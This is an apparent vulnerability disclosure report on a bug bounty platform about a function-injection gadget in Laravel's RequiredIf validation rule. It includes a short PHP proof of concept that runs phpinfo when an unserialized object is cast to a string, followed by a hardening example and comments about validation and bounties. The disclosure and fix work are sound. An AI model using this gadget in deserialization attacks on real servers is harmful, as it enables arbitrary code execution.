Code Injection in laravel/framework

Valid

Reported on

Jun 12th 2021


✍️ Description

Function injection in Illuminate\Validation\Rules\RequiredIf can be exploited to generate gadget chains for deserialization vulnerabilities.

🕵️‍♂️ Proof of Concept

<?php
use Illuminate\Validation\Rules\RequiredIf;

require("vendor/autoload.php");

$gadget = serialize(new RequiredIf("phpinfo"));

echo unserialize($gadget); // exploitation

As soon as the object is cast to a string, the function phpinfo is executed.

💥 Impact

This vulnerability is capable of calling callables and can be utilized in POP gadget chains when exploiting deserialization vulnerabilities.
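
A hardening sketch for the pattern this report describes, added here as an example; it is not code from the report or from Laravel. `HardenedRequiredIf` is a hypothetical stand-in class, and the serialized input is constructed for the demonstration.

```php
<?php
// Added example: HardenedRequiredIf is a hypothetical stand-in, not Laravel's class.
final class HardenedRequiredIf
{
    /** @var \Closure|bool */
    private $condition;

    public function __construct($condition)
    {
        $this->condition = self::checked($condition);
    }

    // unserialize() never runs the constructor, so restored state is re-validated here.
    public function __wakeup(): void
    {
        self::checked($this->condition);
    }

    public function __toString(): string
    {
        $c = $this->condition;
        // Only a Closure is invoked; a string is never treated as a callable.
        return ($c instanceof \Closure ? (bool) $c() : $c === true) ? 'required' : '';
    }

    private static function checked($condition)
    {
        if ($condition instanceof \Closure || is_bool($condition)) {
            return $condition;
        }
        throw new \InvalidArgumentException('Condition must be a Closure or a boolean.');
    }
}

try {
    new HardenedRequiredIf('phpinfo');
} catch (\InvalidArgumentException $e) {
    echo 'constructor: ', $e->getMessage(), PHP_EOL;
}

// Constructed input: a valid serialized object whose boolean is swapped for a function name.
$tampered = str_replace('b:1;', 's:7:"phpinfo";', serialize(new HardenedRequiredIf(true)));
try {
    echo unserialize($tampered);
} catch (\InvalidArgumentException $e) {
    echo 'unserialize: ', $e->getMessage(), PHP_EOL;
}

// At a trust boundary, refuse to instantiate classes at all.
var_dump(unserialize($tampered, ['allowed_classes' => false]) instanceof \__PHP_Incomplete_Class);
```

PHP cannot serialize a Closure, so an object restored from serialized data can only hold a boolean here and the string cast never reaches a function call.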

0xcrypto modified the report
a year ago
0xcrypto submitted a
a year ago
Jamie Slome
a year ago

Admin


@taylorotwell, can you just confirm that this report is valid?

Jamie Slome validated this vulnerability a year ago
0xcrypto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 814d6b a year ago
0xcrypto has been awarded the fix bounty
0xcrypto
a month ago

Researcher


@jamieslome is it possible to get CVE on this one?

Jamie Slome
a month ago

Admin


@0xcrypto - we would first require the go-ahead from the maintainer before assigning a CVE here 👍
